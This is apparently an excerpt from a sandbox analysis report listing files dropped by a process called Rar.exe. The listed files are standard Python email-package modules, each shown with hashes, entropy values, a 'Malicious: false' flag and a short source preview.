                                                                                                                                                                                      Preview:"""Representing and manipulating email headers via custom objects.....This module provides an implementation of the HeaderRegistry API...The implementation is designed to flexibly follow RFC5322 rules..."""..from types import MappingProxyType....from email import utils..from email import errors..from email import _header_value_parser as parser....class Address:.... def __init__(self, display_name='', username='', domain='', addr_spec=None):.. """Create an object representing a full email address..... An address can have a 'display_name', a 'username', and a 'domain'. In.. addition to specifying the username and domain separately, they may be.. specified together by using the addr_spec keyword *instead of* the.. username and domain keywords. If an addr_spec string is specified it.. must be properly quoted according to RFC 5322 rules; an error will be.. raised if it is not..... An Address object has display_name, username, doma
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2206
                                                                                                                                                                                      Entropy (8bit):4.742106820652629
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:fXv/9Im+qoFoz0JSB+GUSRvfROul7IMbwI94gH4LqiQtC:fXHaqoFoAJQeSRh7IMbwtgYAQ
                                                                                                                                                                                      MD5:A8141F0F87485A31CD34D98D9254CC74
                                                                                                                                                                                      SHA1:B89AA38E7162DAD04D6864413013C25E8CBE04AF
                                                                                                                                                                                      SHA-256:7CBB33D39388E72C408E8A64C5DDF044EF546092E6EC48BD62926CDB54E80769
                                                                                                                                                                                      SHA-512:6E68410D8A67AE6656D9BCE4A7C81014A09C61FC9E27EBB8D38835A466172BC39447B7C2E7D91093280DCEF162C9F3EA0DA3A4EC8E70A6F597B4C92E8544FBD0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Various types of useful iterators and generators."""....__all__ = [.. 'body_line_iterator',.. 'typed_subpart_iterator',.. 'walk',.. # Do not include _structure() since it's part of the debugging API... ]....import sys..from io import StringIO.........# This function will become a method of the Message class..def walk(self):.. """Walk over the message tree, yielding each subpart..... The walk is performed in depth-first order. This method is a.. generator... """.. yield self.. if self.is_multipart():.. for subpart in self.get_payload():.. yield from subpart.walk().........# These two functions are imported into the Iterators.py interface module...def body_line_iterator(msg, decode=False):.. """Iterate over the parts, returning string payloads line-by-line..... Optional decode (default False) is passed through to .ge
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):48233
                                                                                                                                                                                      Entropy (8bit):4.389945069848653
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:ykIqfRbIopYv72saLA5/ze9H/9KDiYoeRMqsEC+q6+4xj4UOlZn:ykIqJrp5LA5/zeVlWiYoeRMqsEC+q6+D
                                                                                                                                                                                      MD5:14F6A07A274A381C6C16336912036DF9
                                                                                                                                                                                      SHA1:9E44EBD712548E3B4F616AF023577C71C731D7D9
                                                                                                                                                                                      SHA-256:2A132F508CB491F5D58285B4CDC5F58EB5B7E181E5BDA52683C9E37B3CE1FC9A
                                                                                                                                                                                      SHA-512:30405248116E788B590B009F27E7395D68543738ACFC2A90FB03F8C4BD07DC5FCB0BFB13A85552E81BCCA8256D4B290A84766CCE38C3C43011F652C96A548EF4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Basic message object for the email package object model."""....__all__ = ['Message', 'EmailMessage']....import re..import uu..import quopri..from io import BytesIO, StringIO....# Intrapackage imports..from email import utils..from email import errors..from email._policybase import Policy, compat32..from email import charset as _charset..from email._encoded_words import decode_b..Charset = _charset.Charset....SEMISPACE = '; '....# Regular expression that matches `special' characters in parameters, the..# existence of which force quoting of the parameter value...tspecials = re.compile(r'[ \(\)<>@,;:\\"/\[\]\?=]')......def _splitparam(param):.. # Split header parameters. BAW: this may be too simple. It isn't.. # strictly RFC 2045 (section 5.1) compliant, but it catches most headers.. # found in the wild. We may eventually need a full fledged parser... # RDM: w
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1358
                                                                                                                                                                                      Entropy (8bit):4.663083536091826
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:QUXxpwqf12TR2BeEcyA4IkkqaXzoiXIfr2mdzWBVO96eZv8dVbyMlAQwY:fXocsREexyAkiJCoK83zlDZ
                                                                                                                                                                                      MD5:3694543B1F5BA8545787D841B01B6554
                                                                                                                                                                                      SHA1:286BD4F89559927558A157A054C01BFCB2271034
                                                                                                                                                                                      SHA-256:8911432A19145A0F8D3A869BF9D37BD5B1325C148BCC2196859543714F30162A
                                                                                                                                                                                      SHA-512:D952021F7E76FA9EE3C8E62B7131BDB9D12BFB3DB988E0BC5211A4451E38E1550221785CD1DBF6889BCBE7D081A195D50CE4C9E186494174EA191F448BC4989B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Keith Dart..# Contact: email-sig@python.org...."""Class representing application/* type MIME documents."""....__all__ = ["MIMEApplication"]....from email import encoders..from email.mime.nonmultipart import MIMENonMultipart......class MIMEApplication(MIMENonMultipart):.. """Class for generating application/* MIME documents.""".... def __init__(self, _data, _subtype='octet-stream',.. _encoder=encoders.encode_base64, *, policy=None, **_params):.. """Create an application/* type MIME document..... _data contains the bytes for the raw application data..... _subtype is the MIME content type subtype, defaulting to.. 'octet-stream'..... _encoder is a function which will perform the actual encoding for.. transport of the application data, defaulting to base64 encoding..... Any additional keyword arguments are passed to the base class.. constructor, which
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2813
                                                                                                                                                                                      Entropy (8bit):4.596181813233121
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:2XVEOsRERHk+hYQSitDqaxOviBvSpCkGuCqspqK8WINl/3XH:2X+OsRERHk8YWt+axOvmSpCGCqHK8W8x
                                                                                                                                                                                      MD5:032F9685D64F2E7FA6E25478661277B4
                                                                                                                                                                                      SHA1:EF3D80537F049401798601A14FCAAB47F408B46A
                                                                                                                                                                                      SHA-256:983C68C0876371A4B4079B94F161AC2F0199A453B28CF3FD7D2D23FFC9908CF4
                                                                                                                                                                                      SHA-512:F94B1B4285CEFC24055C41C2E197E824FF8B1C92D13E76CB6F5D67083C5F5CA2CD563BF3D0AFCA7FDB33BE542E53E72B23D1D296475880E8313089500BB49340
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Anthony Baxter..# Contact: email-sig@python.org...."""Class representing audio/* type MIME documents."""....__all__ = ['MIMEAudio']....import sndhdr....from io import BytesIO..from email import encoders..from email.mime.nonmultipart import MIMENonMultipart........._sndhdr_MIMEmap = {'au' : 'basic',.. 'wav' :'x-wav',.. 'aiff':'x-aiff',.. 'aifc':'x-aiff',.. }....# There are others in sndhdr that don't have MIME types. :(..# Additional ones to be added to sndhdr? midi, mp3, realaudio, wma??..def _whatsnd(data):.. """Try to identify a sound file type..... sndhdr.what() has a pretty cruddy interface, unfortunately. This is why.. we re-do it here. It would be easier to reverse engineer the Unix 'file'.. command and use the standard 'magic' file, as shipped with a modern Unix... """.. hdr = data[:512].. fakefile = BytesIO(hdr).. for
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):946
                                                                                                                                                                                      Entropy (8bit):4.87252568068434
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:QUXt+wDEY92ESA2xNa3Xmbztw57PAjIQpDcXN:fXvDEY9sBgmbK5T0Il
                                                                                                                                                                                      MD5:643733D8FE05FDD29E434355BBE37884
                                                                                                                                                                                      SHA1:03BFA9094629480466050858CA260DC598955A30
                                                                                                                                                                                      SHA-256:FD0C74EE4CB66E0AB5F53EF93662C490E7614D25471E70EA5C2F4B8B06B047F4
                                                                                                                                                                                      SHA-512:E0467CB5B333ACC2BC432623A266080795A8AD15D01093EB14701B1DA294FF1F5F08D6E439C9EC2747075C8AADE45618F1DE2095B2DDED97AFAECA1750862987
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Base class for MIME specializations."""....__all__ = ['MIMEBase']....import email.policy....from email import message.........class MIMEBase(message.Message):.. """Base class for MIME specializations.""".... def __init__(self, _maintype, _subtype, *, policy=None, **_params):.. """This constructor adds a Content-Type: and a MIME-Version: header..... The Content-Type: header is taken from the _maintype and _subtype.. arguments. Additional parameters for this header are taken from the.. keyword arguments... """.. if policy is None:.. policy = email.policy.compat32.. message.Message.__init__(self, policy=policy).. ctype = '%s/%s' % (_maintype, _subtype).. self.add_header('Content-Type', ctype, **_params).. self['MIME-Version'] = '1.0'..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1875
                                                                                                                                                                                      Entropy (8bit):4.59865181886179
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:QUXt+wql2TR2BAEcbA/kqar9DKSddMMqer2mdhmhGuTWOy05ipqO96eZv8ZVbsl/:fXvqsREAxbR58z9CkGuCqspqK8jYlKk
                                                                                                                                                                                      MD5:16672CAEC96D7917AAF125DD7276647E
                                                                                                                                                                                      SHA1:24F2A72C284E3F5DBB7C0BA032A0B5DBF07C1E7B
                                                                                                                                                                                      SHA-256:EBD84BB4E0B237C8028FD82213B912C45CE6C8F0AC523E6568E615C2026C84AC
                                                                                                                                                                                      SHA-512:2EA9E30F507F8A5FC7B2A9618E84A8936F890F834E189F9DCF4C5880991537EFBA50C9951DF67663FCA79C0A45D3D3ABF69747A7840112DEA7D4A62CDA632820
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Class representing image/* type MIME documents."""....__all__ = ['MIMEImage']....import imghdr....from email import encoders..from email.mime.nonmultipart import MIMENonMultipart.........class MIMEImage(MIMENonMultipart):.. """Class for generating image/* type MIME documents.""".... def __init__(self, _imagedata, _subtype=None,.. _encoder=encoders.encode_base64, *, policy=None, **_params):.. """Create an image/* type MIME document..... _imagedata contains the bytes for the raw image data. If the data.. can be decoded by the standard Python `imghdr' module, then the.. subtype will be automatically included in the Content-Type header... Otherwise, you can specify the specific image subtype via the _subtype.. parameter..... _encoder is a function which will perform the actual encoding for.. transp
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1351
                                                                                                                                                                                      Entropy (8bit):4.752549320871495
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:QUXt+wq72h2BWEHAGaQ+NGPxCB4/IyHIAhlCnIKVbS4XGPxvz/z:fXv8oEWA8Gpn/XoSlCnI4m4XGprz
                                                                                                                                                                                      MD5:7A30E752AC45C95126D9E4164BEE4DDC
                                                                                                                                                                                      SHA1:178924C1BE52F2D59A135B5F7D8C6BD7293F2076
                                                                                                                                                                                      SHA-256:4915FDDEFCC2702D8771DAE38153B5FA2409DC65D1B37E1D09D86B9CCFEACA31
                                                                                                                                                                                      SHA-512:717896109844010BBC6C47B6A4DB39F2FF04C4215CFC5397CCAAFA67AEE81ADFE487703CC750C988AD33BE4A6BB7FFE93D5C3262C3F20DEC44DB9EE31D05CEB4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Class representing message/* MIME documents."""....__all__ = ['MIMEMessage']....from email import message..from email.mime.nonmultipart import MIMENonMultipart.........class MIMEMessage(MIMENonMultipart):.. """Class representing message/* MIME documents.""".... def __init__(self, _msg, _subtype='rfc822', *, policy=None):.. """Create a message/* type MIME document..... _msg is a message object and must be an instance of Message, or a.. derived class of Message, otherwise a TypeError is raised..... Optional _subtype defines the subtype of the contained message. The.. default is "rfc822" (this is defined by the MIME standard, even though.. the term "rfc822" is technically outdated by RFC 2822)... """.. MIMENonMultipart.__init__(self, 'message', _subtype, policy=policy).. if not isinstance(_msg, message.Mes
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1669
                                                                                                                                                                                      Entropy (8bit):4.575907077936182
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:QVXt+wK2TAPQLwAa7qXWgvXlvO1TaHVHeAdrolTOwQXadJny:6XvKwtMVWm6KTiIbT5y
                                                                                                                                                                                      MD5:78C5928C8D1C5B8C54AFAFB82EE66E44
                                                                                                                                                                                      SHA1:5374AFAB02EFE45CA721E84F70E973BDD426C2ED
                                                                                                                                                                                      SHA-256:804CC010C1AB4D5230A6B56E31167421908B9BCA265A7E0BB516BA34A8C1B6F2
                                                                                                                                                                                      SHA-512:2B348B3246E60DE9943E8FCA20A166402AAC62EB3ABF290AC18A9368F07AAFDC25DA31F84C9C0E2CCFC5C12AFA77CD8689E638A3629E2E378A92CFF3BCAC7A84
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2002-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Base class for MIME multipart/* type messages."""....__all__ = ['MIMEMultipart']....from email.mime.base import MIMEBase.........class MIMEMultipart(MIMEBase):.. """Base class for MIME multipart/* type messages.""".... def __init__(self, _subtype='mixed', boundary=None, _subparts=None,.. *, policy=None,.. **_params):.. """Creates a multipart/* type message..... By default, creates a multipart/mixed message, with proper.. Content-Type and MIME-Version headers..... _subtype is the subtype of the multipart content type, defaulting to.. `mixed'..... boundary is the multipart boundary string. By default it is.. calculated as needed..... _subparts is a sequence of initial subparts for the payload. It.. must be an iterable object, such as a list. You can always.. attach
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):713
                                                                                                                                                                                      Entropy (8bit):4.822289099304847
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:QcbcX920v+bUK5adORDruY23/2ub4WliK1ZPCYpBYiXaMohOWTn:QVXt+wRA2v27K1Z5BLaXYWT
                                                                                                                                                                                      MD5:5A28752E8A554879414A02D5D648EA84
                                                                                                                                                                                      SHA1:3F9FD11DE698EAAB753991C7253C0FF762656D5A
                                                                                                                                                                                      SHA-256:F6493F0506DF33DDC4B6B349BC1280BA374D4DB6E86F43411BC98A062640933F
                                                                                                                                                                                      SHA-512:6F7F3FB449A47B91BAB42368CEEC5219370C90887A342126B4C1CFE5B8327488A772E4648C599A1A6B7BF282A0B50E29AC620B7C71ED6F80A09068B0A6A705B8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2002-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Base class for MIME type messages that are not multipart."""....__all__ = ['MIMENonMultipart']....from email import errors..from email.mime.base import MIMEBase.........class MIMENonMultipart(MIMEBase):.. """Base class for MIME non-multipart type messages.""".... def attach(self, payload):.. # The public API prohibits attaching multiple subparts to MIMEBase.. # derived subtypes since none of them are, by definition, of content.. # type multipart/*.. raise errors.MultipartConversionError(.. 'Cannot attach additional subparts to non-multipart/*')..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1479
                                                                                                                                                                                      Entropy (8bit):4.669713874420808
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:QUXt+wqvdN2/g2BXUEcUd6A0I+96FuW6MZ7jP56rbQb71WBMq3EVsYpBNGpAn7t7:fXvaFEExPTU6MZHB63QbgxEVxpbGpWp7
                                                                                                                                                                                      MD5:E9B16E7B5E7426500F70C0EC09224EE4
                                                                                                                                                                                      SHA1:DC8F36213042123C9181119D6F00AA6F65A542CB
                                                                                                                                                                                      SHA-256:6DB0003D37C87360177BA09299D3F4C3AE4D051389D6C6F997E38149C496624A
                                                                                                                                                                                      SHA-512:A27F295C1CDE4ED496B7336F1FB107791E2B0DB4EA86DBD60C047722612FBB9150A4718F1C27B80BD73A910AB6F41EC15A5CEB8112410EEF39F3763858AC8B04
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Class representing text/* type MIME documents."""....__all__ = ['MIMEText']....from email.charset import Charset..from email.mime.nonmultipart import MIMENonMultipart.........class MIMEText(MIMENonMultipart):.. """Class for generating text/* type MIME documents.""".... def __init__(self, _text, _subtype='plain', _charset=None, *, policy=None):.. """Create a text/* type MIME document..... _text is the string for this message object..... _subtype is the MIME sub content type, defaulting to "plain"..... _charset is the character set parameter added to the Content-Type.. header. This defaults to "us-ascii". Note that as a side-effect, the.. Content-Transfer-Encoding header will also be set... """.... # If no _charset was specified, check to see if there are non-ascii.. # characters present. If not, use 'us
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5172
                                                                                                                                                                                      Entropy (8bit):4.459621934961514
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:2XyKLTo1bb9AHs5ofboK7bG7RGTBMnM4xBw3X1aFFGawps2/fboKhyuRGTjg6DBf:2Xzo1bb9AwOUOGRsUWOonrXUluRQg+0+
                                                                                                                                                                                      MD5:733C13463BE8E3E9FF0F7F9580F81890
                                                                                                                                                                                      SHA1:FB513E85F27DAC34AE6D6233A48D118A04C5725B
                                                                                                                                                                                      SHA-256:2A4247867376B64EE4FD66952F348305AA74EBB5484BC247E0C1D6AD63781B8E
                                                                                                                                                                                      SHA-512:D3468F37667A47B3601BE4DCB6E7FFC0749A0D0A7673F93073C23D713854B043F0927819D4028EFFF6CB58E16074AC437406B52C625D1E2FD1E00AAEF380CACA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Barry Warsaw, Thomas Wouters, Anthony Baxter..# Contact: email-sig@python.org...."""A parser of RFC 2822 and MIME email messages."""....__all__ = ['Parser', 'HeaderParser', 'BytesParser', 'BytesHeaderParser',.. 'FeedParser', 'BytesFeedParser']....from io import StringIO, TextIOWrapper....from email.feedparser import FeedParser, BytesFeedParser..from email._policybase import compat32......class Parser:.. def __init__(self, _class=None, *, policy=compat32):.. """Parser of RFC 2822 and MIME email messages..... Creates an in-memory object tree representing the email message, which.. can then be manipulated and turned over to a Generator to return the.. textual representation of the message..... The string must be formatted as a block of RFC 2822 headers and header.. continuation lines, optionally preceded by a `Unix-from' header. The.. header block is terminated ei
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10607
                                                                                                                                                                                      Entropy (8bit):4.3396219054495955
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:Qv6SMMmTGSigeS0LiEUjoEfgT78kskc5UeKEaYpw9x5bTCBa:Qv6jvTGOvPovT78KeKEbe97TCE
                                                                                                                                                                                      MD5:B50D054F2BAF51C93F864FC45ED046BC
                                                                                                                                                                                      SHA1:54D6B86D09ABE1A2EE1D15C57E9B9E31007C12A6
                                                                                                                                                                                      SHA-256:44B91E9F5D7B510EF085F426DAA6454FB339EA46ED8AC5302EDF84FFE4F9F3A7
                                                                                                                                                                                      SHA-512:6FB8EC11F4BF196F1EC74EC874ADD8193AD6FF571D471177F60923333D8B3D58BB1B9BD3C510D1AED68A82E71426CC17839F741137696B9D13BADE11E0465A49
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""This will be the home for the policy that hooks in the new..code that adds all the email6 features..."""....import re..import sys..from email._policybase import Policy, Compat32, compat32, _extend_docstrings..from email.utils import _has_surrogates..from email.headerregistry import HeaderRegistry as HeaderRegistry..from email.contentmanager import raw_data_manager..from email.message import EmailMessage....__all__ = [.. 'Compat32',.. 'compat32',.. 'Policy',.. 'EmailPolicy',.. 'default',.. 'strict',.. 'SMTP',.. 'HTTP',.. ]....linesep_splitter = re.compile(r'\n|\r')....@_extend_docstrings..class EmailPolicy(Policy):.... """+.. PROVISIONAL.... The API extensions enabled by this policy are currently provisional... Refer to the documentation for details..... This policy adds new header parsing and folding algorithms. Instead of.. simple strings, headers are custom objects with custom attributes.. depending on the type of the field. The fo
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10157
                                                                                                                                                                                      Entropy (8bit):4.8052020140652525
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:/3mMHQE/phvw+cxdP6AwkAZFAFx6Rr7qsXDTFaUf/B2m/fbweCMBsTmam8k2LHd:/t/phvEHzw9ZFAArbXDTvXC4sTcA
                                                                                                                                                                                      MD5:91E0134C7993B62DF821299CBFE9CF20
                                                                                                                                                                                      SHA1:3E647D829457FC8E76B5D36ED31AFF8F383B004F
                                                                                                                                                                                      SHA-256:0AC88715C424E80122E3D861BBACC20EE289562F2C685AEFE40B88471515A1BD
                                                                                                                                                                                      SHA-512:DCC68CED12BC04DC7643FE0B636AF764D7136ED203EB1E74E2B669ED6349E62F5FB6022CC86DC03B4824DFB1E8EF5D59EE648DC9D015A0A44641B6CD01EB22D4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2001-2006 Python Software Foundation..# Author: Ben Gertzfield..# Contact: email-sig@python.org...."""Quoted-printable content transfer encoding per RFCs 2045-2047.....This module handles the content transfer encoding method defined in RFC 2045..to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to..safely encode text that is in a character set similar to the 7-bit US ASCII..character set, but that includes some 8-bit characters that are normally not..allowed in email bodies or headers.....Quoted-printable is very space-inefficient for encoding binary files; use the..email.base64mime module for that instead.....This module provides an interface to encode and decode both headers and bodies..with quoted-printable encoding.....RFC 2045 defines a method for including character set information in an..`encoded-word' in a header. This method is commonly used for 8-bit real names..in To:/From:/Cc: etc. fields, as well as Subject: lines.....This module do
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13793
                                                                                                                                                                                      Entropy (8bit):4.70387477489613
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:+GXDPOM1Dlx0rReFY2yHhDYlYZInHfrVDVw:+GXDPOC/0rz7HhDYF/rg
                                                                                                                                                                                      MD5:AE01B00B737EEB26F6B1A7F13FD5E07A
                                                                                                                                                                                      SHA1:2CD748C706A7B3A7AB9D7B930BEA3DFA05B219D1
                                                                                                                                                                                      SHA-256:521840D2F6A4500BABAF7DF27A2B1FED2E05AC0350BAF367D5454C09ACBEE525
                                                                                                                                                                                      SHA-512:987BCF23CF619BD279C32DC2A70F5F3355300B825D6AF185EF615B6E43361F346B823F74D1234F54441D838B1C7FFEA152275A2E5724F56A6FD7A931510DBE59
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright (C) 2001-2010 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""Miscellaneous utilities."""....__all__ = [.. 'collapse_rfc2231_value',.. 'decode_params',.. 'decode_rfc2231',.. 'encode_rfc2231',.. 'formataddr',.. 'formatdate',.. 'format_datetime',.. 'getaddresses',.. 'make_msgid',.. 'mktime_tz',.. 'parseaddr',.. 'parsedate',.. 'parsedate_tz',.. 'parsedate_to_datetime',.. 'unquote',.. ]....import os..import re..import time..import random..import socket..import datetime..import urllib.parse....from email._parseaddr import quote..from email._parseaddr import AddressList as _AddressList..from email._parseaddr import mktime_tz....from email._parseaddr import parsedate, parsedate_tz, _parsedate_tz....# Intrapackage imports..from email.charset import Charset....COMMASPACE = ', '..EMPTYSTRING = ''..UEMPTYSTRING = ''..CRLF = '\r\n'..TICK = "'"....specialsre = re.compile(r'[][\\()<>@,:;".]')..escap
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5790
                                                                                                                                                                                      Entropy (8bit):4.479931891852748
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:VHdpCpI/qD2Q0pU8F6fdaLcbkCN/yRMffWL1+rpOc6i7AYS2kEJlQ6w1AD4:XpCpIPpHEN/yYi1+NOc6IAYS2kEXQ6wr
                                                                                                                                                                                      MD5:7E6A62EF920CCBBC78ACC236FDF027B5
                                                                                                                                                                                      SHA1:816AFC9EA3C9943E6A7E2FAE6351530C2956F349
